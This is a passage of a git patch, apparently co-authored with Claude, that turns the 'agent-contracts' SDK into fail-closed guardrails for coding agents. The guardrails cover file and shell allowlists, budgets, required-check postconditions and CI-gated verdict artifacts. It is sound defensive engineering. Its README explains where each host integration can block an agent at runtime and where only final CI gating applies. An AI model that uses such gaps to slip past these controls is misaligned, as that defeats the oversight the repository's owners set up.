From b4ccf97650f3f1279994a86c5eec81f051a479eb Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 15:43:31 -0500 Subject: [PATCH 1/4] =?UTF-8?q?feat:=20v0.2.0=20=E2=80=94=20repo-local=20c?= =?UTF-8?q?oding/build=20agent=20guardrails?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Repositions agent-contracts around fail-closed guardrails for autonomous coding/build agents in a repository: filesystem read/write scopes, shell command authorization, shell-command budgets, and a durable verdict artifact that CI can gate on. - filesystem read/write authorization scopes - shell command authorization scopes + max_shell_commands budget - verdict artifact emission and CLI verdict gating - coding-agent trace bootstrap improvements - demo contracts for blocked file writes, blocked commands, failed checks - canonical AGENT_CONTRACT.yaml repositioned as a repo-build agent - README, spec, and examples rewritten around the coding/build scope Co-Authored-By: Claude Opus 4.6 (1M context) --- .github/workflows/ci.yml | 6 + .github/workflows/publish.yml | 53 +- .gitignore | 5 + AGENT_CONTRACT.yaml | 231 +----- CHANGELOG.md | 51 +- CLAUDE.md | 69 -- README.md | 267 ++++--- action.yml | 60 +- .../2026-03-25-agent-contracts-v0.1-design.md | 361 ---------- .../2026-03-25-agent-contracts-v0.1-plan.md | 165 ----- examples/cost_controlled.yaml | 34 +- examples/demo_blocked_command.yaml | 29 + examples/demo_blocked_file_write.yaml | 24 + examples/demo_failed_checks.yaml | 15 + examples/repo_build_agent.yaml | 41 ++ examples/simple_chatbot.yaml | 7 +- examples/support_triage.yaml | 124 +--- pyproject.toml | 19 +- schemas/agent-contract.schema.json | 219 +++++- spec/SPECIFICATION.md | 329 ++++----- src/agent_contracts/__init__.py | 29 +- src/agent_contracts/_version.py | 2 +- src/agent_contracts/adapters/claude_agent.py | 2 +- src/agent_contracts/adapters/crewai.py | 2 +- src/agent_contracts/adapters/openai_agents.py | 2 +- 
src/agent_contracts/adapters/pydantic_ai.py | 2 +- src/agent_contracts/budgets.py | 42 +- src/agent_contracts/cli.py | 291 +++++--- src/agent_contracts/composition.py | 152 ++-- src/agent_contracts/effects.py | 150 ++-- src/agent_contracts/enforcer.py | 667 +++++++++++++----- src/agent_contracts/init_from_trace.py | 221 ++++-- src/agent_contracts/loader.py | 32 +- src/agent_contracts/postconditions.py | 152 ++-- .../schemas/agent-contract.schema.json | 219 +++++- src/agent_contracts/types.py | 22 + tests/conftest.py | 20 +- tests/test_budgets.py | 76 +- tests/test_cli.py | 99 +-- tests/test_composition.py | 2 +- tests/test_effects.py | 90 +-- tests/test_enforcer.py | 161 +++-- tests/test_init_from_trace.py | 61 +- tests/test_loader.py | 45 +- tests/test_postconditions.py | 42 +- 45 files changed, 2525 insertions(+), 2167 deletions(-) delete mode 100644 CLAUDE.md delete mode 100644 docs/plans/2026-03-25-agent-contracts-v0.1-design.md delete mode 100644 docs/plans/2026-03-25-agent-contracts-v0.1-plan.md create mode 100644 examples/demo_blocked_command.yaml create mode 100644 examples/demo_blocked_file_write.yaml create mode 100644 examples/demo_failed_checks.yaml create mode 100644 examples/repo_build_agent.yaml diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 0968fd8..bc49da6 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -21,5 +21,11 @@ jobs: run: pip install -e ".[dev]" - name: Lint run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts - name: Test run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 1864eb1..8be8892 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ 
-1,15 +1,56 @@ -name: Publish to PyPI +name: Release on: - release: - types: [published] + push: + tags: + - "v*" permissions: + contents: write id-token: write +concurrency: ${{ github.workflow }}-${{ github.ref }} + jobs: + verify: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Check repository hygiene + run: | + if git ls-files | rg -n '(^|/)(AGENTS\.md|CLAUDE\.md|docs/plans/|\.omx/|\.pilot/|\.dev-session/|\.staff-engineer-state\.json|\.staff-engineer\.json|ROADMAP\.md)$'; then + echo "Tracked internal-only files found in public release tree." + exit 1 + fi + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - name: Check tag version + run: | + TAG_VERSION="${GITHUB_REF_NAME#v}" + PKG_VERSION="$(python -c "from pathlib import Path; ns = {}; exec(Path('src/agent_contracts/_version.py').read_text(encoding='utf-8'), ns); print(ns['__version__'])")" + test "$TAG_VERSION" = "$PKG_VERSION" + - name: Install dependencies + run: python -m pip install -e ".[dev]" build twine + - name: Lint + run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts + - name: Test + run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml + python -m agent_contracts.cli check-compat examples/support_triage.yaml examples/support_triage.yaml + - name: Build package + run: python -m build + - name: Check distributions + run: python -m twine check dist/* + publish: runs-on: ubuntu-latest + needs: verify environment: pypi steps: - uses: actions/checkout@v4 @@ -17,8 +58,12 @@ jobs: with: python-version: "3.12" - name: Install build tools - run: pip install build + run: python -m pip install build - name: Build package run: python -m build - name: Publish to PyPI uses: pypa/gh-action-pypi-publish@release/v1 + - name: 
Create GitHub Release + uses: softprops/action-gh-release@v2 + with: + generate_release_notes: true diff --git a/.gitignore b/.gitignore index 2a7211b..53932f6 100644 --- a/.gitignore +++ b/.gitignore @@ -18,6 +18,11 @@ htmlcov/ .coverage .coverage.* *.lcov +.omx/ +.pilot/ .dev-session/ .staff-engineer-state.json +AGENTS.md +CLAUDE.md +docs/plans/ ROADMAP.md diff --git a/AGENT_CONTRACT.yaml b/AGENT_CONTRACT.yaml index 7ba7fdd..c22fb6e 100644 --- a/AGENT_CONTRACT.yaml +++ b/AGENT_CONTRACT.yaml @@ -1,219 +1,54 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Canonical coding/build repo contract agent_contract: "0.1.0" identity: - name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. - authors: - - Piyush Vyas + name: repo-build-agent + version: "0.1.0" + description: Fail-closed coding/build agent for this repository. contract: postconditions: - - name: produces_classification + - name: produces_output check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. + description: The run must produce a result object. - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - - - name: has_routing - check: 'output.routed_to is not None' - enforcement: sync_warn - severity: major - description: Should route to a team (warn if not). 
- slo: - target_rate: 0.99 - window: "24h" - - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - -inputs: - schema: - type: object - required: - - ticket_id - - subject - - body - properties: - ticket_id: - type: string - subject: - type: string - body: - type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string - - preconditions: - - name: ticket_not_empty - check: "len(input.body) > 0" - description: Ticket body must not be empty. - -outputs: - schema: - type: object - required: - - priority - - category - properties: - priority: - type: string - enum: ["critical", "high", "medium", "low"] - category: - type: string - routed_to: - type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 + description: Required repo checks must pass before the run is green. 
effects: authorized: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - - notification.send_team - network: - - "https://api.ticketing.internal/*" - - "https://api.customers.internal/*" - - "https://kb.internal/*" - state_writes: - - "tickets.*" - - declared: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - network: - - "https://api.ticketing.internal/v2/tickets" - - "https://api.customers.internal/v1/lookup" - - "https://kb.internal/search" - state_writes: - - "tickets.priority" - - "tickets.assignment" + filesystem: + read: + - "src/**" + - "tests/**" + - "README.md" + - "pyproject.toml" + write: + - "src/**" + - "tests/**" + - "README.md" + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + - "python -m mypy *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.10 - max_tokens: 8000 - max_tool_calls: 15 - max_duration_seconds: 20.0 - -failure_model: - errors: - - name: ticket_not_found - retryable: false - description: The referenced ticket does not exist. - - - name: database_timeout - retryable: true - max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. 
- - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent + max_cost_usd: 1.00 + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 observability: - traces: - enabled: true - sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. - - violation_events: - emit: true - destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/CHANGELOG.md b/CHANGELOG.md index 2128a4c..5b314f8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,47 +1,20 @@ # Changelog -All notable changes to this project will be documented in this file. +All notable changes to this project are tracked here. -The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), -and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). - -## [0.1.1] - 2026-03-26 +## [0.2.0] - 2026-04-02 ### Added -- **OpenAI Agents SDK Adapter** — `ContractRunHooks(RunHooks)` for effect gating via `on_tool_start`, token tracking via `on_llm_end`, postcondition evaluation via `on_agent_end`. 
Pinned to `openai-agents==0.8.4` -- **Claude Agent SDK Adapter** — `ContractHooks` with structured deny via PreToolUse (not exception). Cost/token extraction from ResultMessage. Pinned to `claude-agent-sdk==0.1.50` (Python 3.10+) -- **Precondition Evaluation** — `contract.preconditions[]` evaluated on input BEFORE agent runs. Reuses CEL-like expression evaluator. `PreconditionError` blocks execution before tokens are spent. Wired into `ContractEnforcer.check_preconditions()` and `@enforce_contract` decorator -- **GitHub Action** — `pyyush/agentcontracts@v0.1.1` composite action for CI contract validation -- **README Badge** — PyPI version and CI status badges -- 35 new tests (188 total) - -## [0.1.0] - 2026-03-25 - -First release. YAML spec + Python SDK for production agent reliability. - -### Added +- repo-local coding/build-agent positioning across the README, spec, examples, and canonical contract +- filesystem read/write authorization scopes +- shell command authorization scopes +- shell-command budgets +- verdict artifact emission and CLI verdict gating +- coding-agent trace bootstrap improvements +- coding/build-focused demo contracts and CI action semantics -- **YAML Spec Schema** — JSON Schema (Draft 2020-12) covering 3 graduated tiers: - - Tier 0 (Standalone): identity + postconditions (4 fields to start) - - Tier 1 (Enforceable): + input/output schemas, effects authorization, budgets - - Tier 2 (Composable): + failure model, delegation, observability, SLOs -- **Contract Loading** — YAML parsing, schema validation, tier assessment, upgrade recommendations -- **Effect Authorization** — Default-deny tool gating with glob pattern matching. Effects split: `authorized` (intersection during delegation) vs `declared` (union for audit) -- **Budget Enforcement** — Thread-safe circuit breaker for cost, tokens, tool calls, and elapsed time. 
Raises `BudgetExceededError` when thresholds are hit -- **Postcondition Evaluator** — Safe CEL-like expression evaluator (no `eval()`). Supports `is None`, comparisons, membership tests, `len()`. Three enforcement timings: `sync_block`, `sync_warn`, `async_monitor` -- **Violation Events** — OTel-compatible structured events with contract_id, violated_clause, evidence, severity, and trace context. Emits to stdout, OpenTelemetry SDK, or callback -- **Runtime Enforcer** — Unified middleware wiring effects, budgets, postconditions, and violations. Works as decorator (`@enforce_contract`), context manager, or explicit API -- **Composition Checker** — Contract Differential analysis: schema gaps, capability gaps, budget gaps, effect violations between producer/consumer contracts -- **CLI** — Four commands: - - `aicontracts validate` — schema validation + tier + recommendations - - `aicontracts check-compat` — composition compatibility check - - `aicontracts init --from-trace` — generate contract skeleton from JSONL traces - - `aicontracts test --eval-suite` — run eval suite against postconditions -- **Framework Adapters** — LangChain (`ContractCallbackHandler`), CrewAI (`ContractGuard`), Pydantic AI (`ContractMiddleware`). 
Each under 200 lines, 3-line integration -- **MCP Extension Proposal** — `x-agent-contract` for tool-level preconditions, effect declarations, and trust metadata -- **Specification** — Human-readable spec narrative (`SPECIFICATION.md`) -- **Examples** — Reference contracts for all 3 tiers +### Changed -[0.1.1]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.1 -[0.1.0]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.0 +- promoted the coding/build-agent guardrail work into the v0.2.0 release line +- clarified Claude/Codex/OpenAI integration limits around hard stops vs final CI gating diff --git a/CLAUDE.md b/CLAUDE.md deleted file mode 100644 index 5874091..0000000 --- a/CLAUDE.md +++ /dev/null @@ -1,69 +0,0 @@ -# Agent Contracts - -## What This Is - -YAML spec + Python SDK for production agent reliability. Enforces cost control, tool-use security, and audit trails at the runtime boundary. - -## Structure - -``` -schemas/agent-contract.schema.json JSON Schema (all 3 tiers) -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ - __init__.py Public API surface - types.py Frozen dataclasses (Contract, etc.) 
- schema.py JSON Schema loading + validation - loader.py YAML loading → Contract objects - tier.py Tier assessment (0/1/2) + recommendations - effects.py Default-deny effect gating (glob patterns) - budgets.py Thread-safe budget tracker + circuit breaker - postconditions.py Safe expression evaluator (no eval()) - violations.py OTel-compatible violation events - enforcer.py Unified enforcement middleware - composition.py Contract Differential checker - cli.py CLI (validate, check-compat, init, test) - init_from_trace.py Generate contracts from JSONL traces - adapters/ - langchain.py LangChain CallbackHandler - crewai.py CrewAI ContractGuard - pydantic_ai.py Pydantic AI ContractMiddleware - openai_agents.py OpenAI Agents SDK RunHooks - claude_agent.py Claude Agent SDK ContractHooks -examples/ Reference contracts (Tier 0, 1, 2) -tests/ pytest test suite -``` - -## Conventions - -- **Python 3.9+** — uses `from __future__ import annotations` for modern syntax -- **Type-safe** — full type annotations, `frozen=True` dataclasses, `py.typed` marker -- **No eval()** — CEL-like expressions parsed by safe evaluator -- **Default-deny** — effects.authorized is an allowlist; unlisted = blocked -- **Thread-safe** — budget counters use `threading.Lock` -- **Minimal deps** — core requires only pyyaml, jsonschema, click -- **Framework adapters** — optional extras, <200 LOC each - -## Testing - -```bash -pip install -e ".[dev]" -pytest # Run all tests -pytest -v # Verbose -pytest --cov # With coverage -``` - -## Key Commands - -```bash -aicontracts validate contract.yaml -aicontracts check-compat a.yaml b.yaml -aicontracts init --from-trace traces.jsonl -aicontracts test contract.yaml --eval-suite evals/ -``` - -## Version - -- Current: 0.1.0 -- License: Apache-2.0 -- Author: Piyush Vyas diff --git a/README.md b/README.md index ec2c73c..42069a1 100644 --- a/README.md +++ b/README.md @@ -1,38 +1,42 @@ # Agent Contracts 
-[![PyPI](https://img.shields.io/pypi/v/aicontracts)](https://pypi.org/project/aicontracts/) [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) -**YAML spec + validation SDK for production agent reliability.** +**Repo-local, fail-closed guardrails for autonomous coding/build agents.** -Cost control, tool-use security, and audit trails in under 30 minutes of integration. Works with any framework. Enforces at the runtime layer, not via prompts. +`agent-contracts` lets a repository declare what an agent may read, write, run, call, and spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. -``` +```bash pip install aicontracts ``` -## The Problem +## What it solves + +Without a repo-local contract, coding agents usually run with ambient authority. +That creates five common failure modes: -Production agents fail at 41-87% rates. 97% of enterprises with agents in production haven't figured out how to scale them. The four pain points: +- edits outside the intended file scope +- forbidden shell commands +- unauthorized tool or network calls +- silent budget overruns +- fake green runs when repo checks are red -| Problem | Without Contracts | With Contracts | -|---------|------------------|----------------| -| **Cost runaway** | No ceiling on token spend | Budget circuit breaker per invocation | -| **Unauthorized tool use** | Ambient authority, prompt-bypassable | Default-deny allowlist at SDK layer | -| **No audit trail** | No record of authorized vs. actual | OTel-compatible violation events | -| **Silent regressions** | Prompt changes break things invisibly | Versioned contracts with SLO monitoring | +Agent Contracts keeps the scope narrow: -## 5-Minute Quick Start +> declare the repo-local contract, enforce it at runtime and in CI, and fail closed with a verdict artifact. -### 1. 
Write a Contract (or generate one) +## 5-minute quick start + +### 1. Write a coding-agent contract ```yaml # AGENT_CONTRACT.yaml agent_contract: "0.1.0" identity: - name: my-agent - version: "1.0.0" + name: repo-build-agent + version: "0.1.0" + description: Safe coding/build agent for this repository. contract: postconditions: @@ -41,144 +45,185 @@ contract: enforcement: sync_block severity: critical + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + effects: authorized: - tools: [search, database.read] - network: ["https://api.example.com/*"] + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.50 - max_tokens: 10000 + max_tokens: 50000 max_tool_calls: 20 -``` - -Or generate from observed behavior: + max_shell_commands: 10 + max_duration_seconds: 1800 -```bash -aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### 2. Enforce at Runtime +### 2. 
Enforce it in the agent runtime ```python -from agent_contracts import load_contract, ContractEnforcer +from agent_contracts import ContractEnforcer, load_contract contract = load_contract("AGENT_CONTRACT.yaml") -with ContractEnforcer(contract) as enforcer: - # Each tool call is checked against the allowlist and budget - enforcer.check_tool_call("search") # OK - in allowlist - enforcer.check_tool_call("delete_all") # BLOCKED - not authorized - - enforcer.add_cost(0.05) # Tracked against max_cost_usd - enforcer.add_tokens(500) # Tracked against max_tokens +with ContractEnforcer(contract, host_name="codex") as enforcer: + enforcer.check_file_read("src/app.py") + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/test_app.py") - # Postconditions evaluated after execution - enforcer.evaluate_postconditions(result) -``` + result = {"status": "done"} -### 3. Framework Integration (3 lines) + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output=result) -**LangChain:** -```python -from agent_contracts.adapters.langchain import ContractCallbackHandler -handler = ContractCallbackHandler.from_file("AGENT_CONTRACT.yaml") -agent.invoke({"input": query}, config={"callbacks": [handler]}) +print(verdict.outcome) # pass | warn | blocked | fail +print(verdict.artifacts) # includes verdict artifact path ``` -**CrewAI:** -```python -from agent_contracts.adapters.crewai import ContractGuard -guard = ContractGuard.from_file("AGENT_CONTRACT.yaml") -result = guard.execute(crew, inputs={"query": query}) -``` - -**Pydantic AI:** -```python -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -middleware = ContractMiddleware.from_file("AGENT_CONTRACT.yaml") -result = await middleware.run(agent, prompt) -``` +### 3. 
Gate the verdict in CI -**OpenAI Agents SDK:** -```python -from agent_contracts.adapters.openai_agents import ContractRunHooks -hooks = ContractRunHooks.from_file("AGENT_CONTRACT.yaml") -result = await Runner.run(agent, "prompt", run_hooks=[hooks]) +```bash +python -m agent_contracts.cli validate AGENT_CONTRACT.yaml +python -m agent_contracts.cli check-verdict .agent-contracts/runs/<run_id>/verdict.json ``` -**Claude Agent SDK:** -```python -from agent_contracts.adapters.claude_agent import ContractHooks -hooks = ContractHooks.from_file("AGENT_CONTRACT.yaml") -# Pass hooks.pre_tool_use to ClaudeAgentOptions +## Verdict artifacts + +Every meaningful run can emit one compact artifact, for example: + +```json +{ + "run_id": "...", + "outcome": "pass", + "final_gate": "allowed", + "checks": [ + {"name": "pytest", "status": "pass", "exit_code": 0}, + {"name": "ruff", "status": "pass", "exit_code": 0} + ], + "budgets": { + "tokens": 12345, + "tool_calls": 0, + "shell_commands": 2, + "duration_seconds": 18.2 + }, + "violations": [] +} ``` -## Three Tiers +Outcome semantics: -Start simple, add guarantees as production demands. 
- -| Tier | Fields | Value | -|------|--------|-------| -| **0: Standalone** | identity + 1 postcondition (4 fields) | Self-documentation, local validation | -| **1: Enforceable** | + schemas, effects, budgets | Cost control, tool gating, I/O validation | -| **2: Composable** | + failure model, delegation, observability, SLOs | Multi-agent composition, audit trails, canary gates | +- `pass` — required checks and blocking clauses passed +- `warn` — allowed to proceed, but warnings were recorded +- `blocked` — an operation was denied during the run +- `fail` — the run completed, but required checks or critical postconditions failed ## CLI ```bash -# Validate a contract -aicontracts validate AGENT_CONTRACT.yaml +# Validate a contract and show coding/build surfaces +python -m agent_contracts.cli validate AGENT_CONTRACT.yaml # Check composition compatibility -aicontracts check-compat producer.yaml consumer.yaml +python -m agent_contracts.cli check-compat producer.yaml consumer.yaml + +# Bootstrap from traces +python -m agent_contracts.cli init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml -# Generate from execution traces -aicontracts init --from-trace traces.jsonl +# Generate a coding-agent starter template +python -m agent_contracts.cli init --template coding -# Run eval suite against postconditions -aicontracts test AGENT_CONTRACT.yaml --eval-suite tests/ +# Gate a verdict artifact in CI +python -m agent_contracts.cli check-verdict .agent-contracts/runs/<run_id>/verdict.json ``` -## Key Design Decisions +## Host integrations -1. **Spec + SDK, not protocol or platform** — the OpenAPI model -2. **YAML primary** — JSON Schema validation, CEL-like inline expressions -3. **Graduated tiers** — Tier 0 is 4 fields, not 40 -4. **Effects: authorized vs. declared** — intersection for delegation, union for audit -5. **Enforcement at SDK layer** — never in prompts (prompt injection can't bypass) -6. 
**MCP extension, not fork** — `x-agent-contract` on tool definitions +### Claude Code / Claude SDK -## Positioning +Claude is the strongest local hard-stop path in this repo today because it can deny tool use before execution through hooks. Use the repo contract as the source of truth, and map the contract's allowlists into Claude's hook surface where possible. -MCP governs how agents connect. Agent Skills govern what agents advertise. -A2A governs how agents find each other. **Agent Contracts govern what agents -must do, must not do, and what happens when they fail.** +### Codex -## Project Structure +Codex can use the same repo-local contract for enforcement in wrappers and for final CI gating via verdict artifacts. The contract file stays in the repo; CI becomes the final source of truth for merge readiness. +### OpenAI Agents SDK + +The OpenAI adapter can block tool execution at `on_tool_start`, but cannot recover reasoning tokens already spent deciding to call the tool. The docs and adapter are explicit about that limit. + +## GitHub Action + +```yaml +- uses: pyyush/agentcontracts@v0.2.0 + with: + contract: AGENT_CONTRACT.yaml + verdict: .agent-contracts/runs/${{ github.run_id }}/verdict.json ``` -schemas/ JSON Schema for AGENT_CONTRACT.yaml -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ Python SDK - loader.py Contract loading + validation - enforcer.py Runtime enforcement middleware - effects.py Default-deny effect gating - budgets.py Budget tracking + circuit breaker - postconditions.py Postcondition evaluation - violations.py OTel-compatible violation events - composition.py Contract Differential checker - cli.py CLI tool - adapters/ Framework adapters -examples/ Reference contracts (Tier 0, 1, 2) + +The action validates contracts and, when a verdict path is provided, fails the workflow for `blocked` or `fail` outcomes. 
+ +## Canonical examples + +- `AGENT_CONTRACT.yaml` — canonical repo-build agent contract +- `examples/repo_build_agent.yaml` — reference coding/build repo contract +- `examples/demo_blocked_file_write.yaml` — protected-file demo +- `examples/demo_blocked_command.yaml` — forbidden-command demo +- `examples/demo_failed_checks.yaml` — red-checks demo +- `examples/support_triage.yaml` — broader tier-2 example retained for composition docs + +## Project structure + +```text +schemas/ JSON Schema for AGENT_CONTRACT.yaml +spec/SPECIFICATION.md Human-readable specification +src/agent_contracts/ Python SDK + cli.py CLI entry point + loader.py YAML loading + validation + types.py Dataclasses / type model + effects.py Tool, filesystem, network, and shell authorization + budgets.py Budget tracking + postconditions.py Postcondition evaluation + enforcer.py Runtime enforcement + verdict artifacts + init_from_trace.py Bootstrap from traces + adapters/ Host/framework integrations +examples/ Reference contracts and demos +action.yml GitHub composite action +AGENT_CONTRACT.yaml Canonical coding-agent contract ``` -## License +## Scope and non-goals -Apache-2.0 +This repo is intentionally narrow. 
+ +In scope: + +- repo-local contracts for coding/build agents +- file, shell, tool, network, and budget boundaries +- runtime + CI gating +- durable verdict artifacts -## Author +Out of scope for the current release: -Piyush Vyas +- hosted control planes +- compliance dashboards +- generic agent governance positioning +- speculative multi-agent infrastructure + +## License + +Apache-2.0 diff --git a/action.yml b/action.yml index b4b1c1c..4e163cb 100644 --- a/action.yml +++ b/action.yml @@ -1,5 +1,5 @@ -name: 'AI Contracts Validate' -description: 'Validate agent contracts against the AI Contracts spec' +name: 'Agent Contracts Gate' +description: 'Validate repo-local agent contracts and optionally gate a run verdict artifact' branding: icon: 'shield' color: 'blue' @@ -8,8 +8,16 @@ inputs: contract: description: 'Path to contract YAML file(s), space-separated' required: true + verdict: + description: 'Optional verdict artifact path to gate' + required: false + default: '' fail-on-warning: - description: 'Fail if contract has upgrade recommendations' + description: 'Fail if contract validation returns upgrade recommendations' + required: false + default: 'false' + fail-on-warn-outcome: + description: 'Fail if the verdict outcome is warn' required: false default: 'false' python-version: @@ -20,10 +28,13 @@ inputs: outputs: outcome: description: 'pass or fail' - value: ${{ steps.validate.outputs.outcome }} + value: ${{ steps.gate.outputs.outcome }} tier: description: 'Contract tier (0, 1, or 2)' - value: ${{ steps.validate.outputs.tier }} + value: ${{ steps.gate.outputs.tier }} + verdict-outcome: + description: 'Verdict outcome when a verdict artifact is provided' + value: ${{ steps.gate.outputs.verdict_outcome }} runs: using: 'composite' @@ -34,25 +45,46 @@ runs: - name: Install aicontracts shell: bash - run: pip install aicontracts + run: python -m pip install aicontracts==0.2.0 - - name: Validate contracts - id: validate + - name: Validate contract and verdict + id: 
gate shell: bash run: | + set -euo pipefail outcome="pass" + tier="" + verdict_outcome="" + for contract in ${{ inputs.contract }}; do echo "::group::Validating $contract" - result=$(aicontracts validate "$contract" -j) - if [ $? -eq 0 ]; then - tier=$(echo "$result" | python3 -c "import sys,json; print(json.load(sys.stdin)['tier'])") - echo "tier=$tier" >> "$GITHUB_OUTPUT" - else + result=$(python -m agent_contracts.cli validate "$contract" --json-output) + tier=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(data["tier"])') + recommendations=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(len(data["recommendations"]))') + echo "$result" + echo "::endgroup::" + if [ "${{ inputs.fail-on-warning }}" = "true" ] && [ "$recommendations" -gt 0 ]; then outcome="fail" fi - echo "::endgroup::" done + + if [ -n "${{ inputs.verdict }}" ]; then + echo "::group::Checking verdict ${{ inputs.verdict }}" + extra_flag="" + if [ "${{ inputs.fail-on-warn-outcome }}" = "true" ]; then + extra_flag="--fail-on-warn" + fi + if ! 
python -m agent_contracts.cli check-verdict "${{ inputs.verdict }}" $extra_flag; then + outcome="fail" + fi + verdict_outcome=$(python -c 'import json,sys; print(json.load(open(sys.argv[1], encoding="utf-8"))["outcome"])' "${{ inputs.verdict }}") + echo "::endgroup::" + fi + + echo "tier=$tier" >> "$GITHUB_OUTPUT" echo "outcome=$outcome" >> "$GITHUB_OUTPUT" + echo "verdict_outcome=$verdict_outcome" >> "$GITHUB_OUTPUT" + if [ "$outcome" = "fail" ]; then exit 1 fi diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md b/docs/plans/2026-03-25-agent-contracts-v0.1-design.md deleted file mode 100644 index fb3af96..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md +++ /dev/null @@ -1,361 +0,0 @@ -# Agent Contracts v0.1 — Design Document - -## Metadata -- **Status:** Draft -- **Author:** Piyush Vyas -- **Date:** 2026-03-25 -- **Reviewers:** Claude quality-reviewer, Codex cross-reviewer -- **Complexity Tier:** Complex - ---- - -## Context & Problem Statement - -Production AI agents fail at 41–86.7% rates (MAST taxonomy, 1,642 traces across 7 frameworks). -97% of enterprises with agents in production cannot scale them. The dominant failure modes — -cost runaway, unauthorized tool use, missing audit trails, silent regressions — have no -framework-agnostic solution. - -MCP owns transport. LangChain/CrewAI own orchestration. Datadog/Langfuse own observability. -**No layer governs what an agent may do, must guarantee, and what happens when it fails.** - -Agent Contracts fills this gap: a YAML spec + validation SDK that enforces agent behavior -at the runtime boundary. The OpenAPI model — a machine-readable document that generates -tooling leverage. - -**Why now:** EU AI Act high-risk requirements take effect Aug 2026. HIPAA Security Rule update -makes AI handling ePHI subject to mandatory controls. The standards window closes in 12–18 months. - ---- - -## Goals - -1. 
